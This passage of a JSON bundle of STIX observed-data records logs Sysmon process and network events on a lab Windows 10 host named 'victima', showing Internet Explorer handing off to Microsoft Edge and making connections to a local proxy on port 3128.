| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e001-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE\" SCODEF:6492 CREDAT:9474 /prefetch:2" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 7072, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=3 --ie-frame-hwnd=300d6", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:23.343903094Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:17.004Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Internet Explorer\\IEXPLORE.EXE", | |
| "SCODEF:6492", | |
| "CREDAT:9474", | |
| "/prefetch:2" | |
| ], | |
| "parent_args_count": 4, | |
| "parent_entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e001-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.355Z", | |
| "last_observed": "2022-07-27T14:26:14.355Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--4f2531d3-4cb8-4e36-acb6-4f922eb2afad", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.918Z", | |
| "modified": "2022-07-28T16:05:22.918Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e101-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 6492, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" http://www.ibm.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 5260, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=3 --ie-frame-hwnd=300d6", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:23.347113260Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.004Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files\\Internet Explorer" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files\\Internet Explorer\\iexplore.exe", | |
| "http://www.ibm.com/" | |
| ], | |
| "parent_args_count": 2, | |
| "parent_entity_id": "{ca21cdf6-4afe-62e1-de01-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "IEToEdge BHO", | |
| "pe_description": "IEToEdge BHO", | |
| "pe_original_file_name": "ie_to_edge_stub.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e101-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.391Z", | |
| "last_observed": "2022-07-27T14:26:14.391Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--32483b42-79b4-4fe3-bf94-1a61ce9202af", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.918Z", | |
| "modified": "2022-07-28T16:05:22.918Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b06-62e1-e101-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 5260, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=3 --ie-frame-hwnd=300d6" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 8244, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=3 --ie-frame-hwnd=300d6", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:23.348393810Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.004Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=3", | |
| "--ie-frame-hwnd=300d6" | |
| ], | |
| "parent_args_count": 3, | |
| "parent_entity_id": "{ca21cdf6-4b06-62e1-e101-000000001400}", | |
| "pe_file_version": "103.0.1264.62", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-4b06-62e1-e201-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.707Z", | |
| "last_observed": "2022-07-27T14:26:14.707Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--549010fc-bfce-4a70-9800-d7b9a144d02c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.918Z", | |
| "modified": "2022-07-28T16:05:22.918Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 5260, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:26:23.349460812Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.004Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b06-62e1-e101-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.771Z", | |
| "last_observed": "2022-07-27T14:26:14.771Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--dc0d849c-ec3a-42a6-8753-dd1e292aa180", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.919Z", | |
| "modified": "2022-07-28T16:05:22.919Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:23.351269918Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.024Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50157, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:qYWapf9ez1yQHIYW8o4Mk67AWM4=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:13.934Z", | |
| "last_observed": "2022-07-27T14:26:13.934Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--51579afa-c69e-4932-a6de-6e69e8187a93", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.919Z", | |
| "modified": "2022-07-28T16:05:22.919Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:23.352081956Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:17.024Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50158, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:GCjQoQmsHatjThBvSTouHezPFMQ=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.891Z", | |
| "last_observed": "2022-07-27T14:26:14.891Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--4a2b3e1e-45c1-467a-9c4f-98941cd3c0e1", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.919Z", | |
| "modified": "2022-07-28T16:05:22.919Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:23.352883669Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:17.024Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50159, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "14": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "15": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:gcc3DGjs5JNAvOpWrgHN0myGelw=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:14.900Z", | |
| "last_observed": "2022-07-27T14:26:14.900Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--99f476d4-5bd1-4f7d-bf1b-1c10d9a4ebcf", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.920Z", | |
| "modified": "2022-07-28T16:05:22.920Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "iexplore.exe", | |
| "pid": 8872, | |
| "binary_ref": "3", | |
| "creator_user_ref": "14", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "7", | |
| "ingested": "2022-07-27T14:26:23.353669120Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:17.024Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "14", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b03-62e1-df01-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "iexplore.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Internet Explorer" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 3128, | |
| "dst_ref": "6", | |
| "src_port": 50160, | |
| "src_ref": "11", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.2" | |
| }, | |
| "7": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "8", | |
| "9" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "10" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "8": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "9": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "10": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "11": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "12": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "13": { | |
